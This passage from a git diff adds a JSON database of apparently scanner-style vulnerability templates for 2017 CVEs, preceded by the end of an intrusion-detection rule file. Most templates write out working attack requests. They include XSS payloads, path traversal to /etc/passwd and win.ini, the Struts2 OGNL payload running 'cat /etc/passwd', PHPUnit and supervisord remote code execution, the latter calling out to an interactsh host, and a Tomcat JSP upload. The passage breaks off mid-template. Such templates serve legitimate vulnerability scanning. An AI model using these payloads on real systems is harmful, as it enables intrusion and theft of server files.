attempts","tags":["ssrf","oob"],"impact":10},{"id":80,"rule":"(?i)(?:on(?:webkitanimationiteration|(?:(?:webkitanimation|(?:select|drag))s|t(?:ransition|ouch)s)tart|(?:webkit(?:transi|anima)tione|t(?:ransition|ouch)e|scrolle)nd|(?:beforescriptexecut|afterscriptexecut|(?:p(?:ointerrawupda|(?:opsta|as))|timeupda)t|b(?:eforetoggl|ounc)|(?:pointer|drag)leav|(?:pointer|touch)mov|mouse(?:lea|mo)v|pa(?:gehid|us)|resiz|clos)e|(?:mozfullscreen|fullscreen|(?:selec|dura)tion|hash|cue)change|unhandledrejection|a(?:nimation(?:iteration|cancel|start|end)|fterprint|uxclick)|transitioncancel|toggle\\(popover\\)|loaded(?:meta)?data|(?:canplaythroug|searc)h|(?:transitionru|(?:pointer|key)dow|mousedow|(?:focus|beg)i)n|pointerenter|(?:beforeunloa|invali|(?:seek|end)e|unloa)d|volumechange|c(?:(?:ontextmenu|ut)|opy)|(?:pointerov|drag(?:ent|ov))er|(?:(?:beforeinp|focuso)u|beforeprin|pointerou|beforecu|mouseou|submi|re(?:pea|se)|inpu)t|beforecopy|mouse(?:enter|over|up)|(?:mouse)?wheel|ratechange|(?:pointeru|keyu|dro)p|pageshow|progress|keypress|dblclick|canplay|dragend|playing|s(?:eeking|how)|message|s(?:croll|elect)|toggle|finish|change|focus|(?:erro|blu)r|click|start|drag|load|play|end))\\s*?=","description":"Detects common event attributes and properties","tags":["xss","csrf","id","rfe"],"impact":6}]} diff --git a/db/cves.json b/db/cves.json new file mode 100644 index 00000000..912fbe11 --- /dev/null +++ b/db/cves.json @@ -0,0 +1 @@ +{"templates":[{"id":"CVE-2017-18490","info":{"name":"Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Contact Form Multi by\")"],"condition":"and"}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-7855","info":{"name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["lang=\"\">","IceWarp"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/emag-marketplace-connector/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18529","info":{"name":"PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"PromoBar by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18562","info":{"name":"Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Error Log Viewer by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Amty Thumb","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert(document.domain)\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-3132","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var action = '\\\">All\")","contains(body_3, \"Visitors Online by\")"],"condition":"and"}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18492","info":{"name":"Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Contact Form to DB by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18542","info":{"name":"Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Zendesk Help Center by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18564","info":{"name":"Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/sender/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Sender by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18500","info":{"name":"Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Social Buttons Pack by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\\Windows\\win.ini\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqgb7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18557","info":{"name":"Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Google Maps by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18496","info":{"name":"Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Htaccess by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18505","info":{"name":"BestWebSoft's Twitter < 2.55 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Twitter Button by\")"],"condition":"and"}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5871","info":{"name":"Odoo <= 8.0-20160726 & 9.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/session/logout?redirect=https://oast.me","{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f","{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/qards/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-18491","info":{"name":"Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Contact Form by\")"],"condition":"and"}]}]},{"id":"CVE-2017-3131","info":{"name":"FortiOS 5.4.0 to 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","GET /ng/fortiview/app/15832%22%20onmouseover=alert(document.domain)%20x=%22y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["id_15832\" onmouseover=\"alert(document.domain)\""]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n\n supervisor.supervisord.options.warnings.linecache.os.system\n \n \n nslookup {{interactsh-url}}\n \n \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["",""],"condition":"and"}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18532","info":{"name":"Realty by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/realty/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \">\\\">All\")","contains(body_3, \"Realty by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code 